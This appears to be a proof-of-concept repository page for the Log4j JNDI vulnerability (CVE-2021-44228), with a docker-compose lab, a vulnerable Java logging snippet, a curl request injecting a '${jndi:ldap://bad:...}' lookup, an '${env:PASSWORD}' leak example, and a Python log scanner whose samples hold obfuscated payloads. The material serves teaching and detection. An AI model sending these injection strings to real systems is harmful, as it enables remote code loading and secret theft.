
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability

Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Description: Sample docker-compose setup to show how this exploit works

Readme
# Example of log4j exploit

This repo has a working sample of abusing the recent [log4j exploit](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance). It does not perform actual remote code execution, but it shows how easily a bad actor can make a vulnerable application call out to an LDAP server they control.

This uses the excellent log4j sample vulnerable app created by christophetd: https://github.com/christophetd/log4shell-vulnerable-app

## Explanation

This vulnerability abuses the `lookup` functionality of log4j, specifically the `jndi` lookup, which allows log4j to fetch data from external hosts and insert it into the log message. This can be exploited to do anything from logging sensitive variables in the environment to executing code remotely.

Lookups are done for any text wrapped in `${}` when the logger is called. For example,

```
${jndi:ldap://someldapserver:1389/o=example}
```
would do a lookup on that LDAP server with the given query and write the result into the log.

A simpler example that doesn't use jndi, but is still dangerous:

```
${env:PASSWORD}
```

This would print the contents of that environment variable into the logs. Anyone with access to view those logs could then extract sensitive data from the application.

## log4j Code

The application code that lets this be abused is straightforward: you only need to call the logger with a request property, unsanitized. For example, you could log the contents of the `User-Agent` header:

```
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
...
private static final Logger logger = LogManager.getLogger();

@GetMapping("/bad")
public void Bad(@RequestHeader("User-Agent") String userAgent) {
    // The header value is concatenated straight into the message, so any
    // ${...} lookup it contains is evaluated by log4j when the line is written.
    logger.info("Received User-Agent header " + userAgent);
}
```

## Using this example

First, build the local ldap server:

```
docker build -t ldapnode .
```

Once built, bring up the whole stack by running

```
docker-compose up
```

Then, you can perform a request to the app, using the `x-api-version` header to inject the lookup:

```
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'
```

After that request, the docker-compose logs show that the LDAP server was called:

```
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c
```
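The log lines above are what an operator sees after the fact. As an added example (not part of this repo or of the vulnerable app), the scanner below runs over constructed access-log lines in an assumed `header="value"` format and flags headers that carry a `${...}` lookup, unwinding the nested `${lower:...}` and `${::-...}` forms that are used to hide the literal string `jndi` from a naive search:

```python
import re

# Constructed sample access-log lines (not from the original repo): each request
# header is written as name="value" so the scanner can pick the fields apart.
SAMPLE_LOG = [
    '2021-12-14T02:43:11Z 10.0.0.5 GET / x-api-version="${jndi:ldap://bad:1389/o=example}"',
    '2021-12-14T02:43:12Z 10.0.0.6 GET / x-api-version="1.0"',
    '2021-12-14T02:43:13Z 10.0.0.7 GET /bad user-agent="${${lower:j}ndi:rmi://bad:1099/x}"',
    '2021-12-14T02:43:14Z 10.0.0.8 GET / user-agent="curl/7.79 ${env:PASSWORD}"',
]

FIELD_RE = re.compile(r'(\S+)="([^"]*)"')


def normalize(value: str) -> str:
    """Collapse the innermost lookups that are commonly nested to hide 'jndi'.

    Log4j resolves nested lookups inside out, so a naive search for the literal
    string '${jndi:' misses '${${lower:j}ndi:...}' or '${${::-j}ndi:...}'.
    Repeat until nothing changes so several layers of nesting unwind.
    """
    prev = None
    while prev != value:
        prev = value
        value = re.sub(r'\$\{lower:([^${}]*)\}', lambda m: m.group(1).lower(), value)
        value = re.sub(r'\$\{upper:([^${}]*)\}', lambda m: m.group(1).upper(), value)
        # '${name:-default}' evaluates to 'default' when 'name' is not defined,
        # so '${::-j}' evaluates to the single character 'j'.
        value = re.sub(r'\$\{[^${}]*?:-([^${}]*)\}', r'\1', value)
    return value


def scan(lines):
    """Return (line_no, header, kind, normalized value) for every header that
    still carries a ${...} lookup after normalization. 'jndi' is the RCE case;
    'lookup' covers the rest, e.g. ${env:...} leaking secrets into the logs."""
    findings = []
    for n, line in enumerate(lines, 1):
        for header, raw in FIELD_RE.findall(line):
            norm = normalize(raw)
            if "${" not in norm:
                continue
            kind = "jndi" if "${jndi:" in norm.lower() else "lookup"
            findings.append((n, header, kind, norm))
    return findings


if __name__ == "__main__":
    for n, header, kind, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {kind:6} in {header}: {norm}")
```

A hit on a `jndi` lookup in any request field is a strong indicator that the host was probed, whichever header the attacker chose; the application's own log line (like the `LdapCtx@...` entry above) confirms the lookup was actually evaluated.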

## What to do if you are impacted

Please see [this documentation](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance) for resolution paths.
File Snapshot

```
[4.0K] /data/pocs/a5badb99e4837ede43bb8aeab5289a2fdb41db4c
├── [ 227] docker-compose.yml
├── [  82] Dockerfile
├── [ 272] index.js
├── [ 294] package.json
├── [8.9K] package-lock.json
└── [2.5K] README.md

0 directories, 6 files
```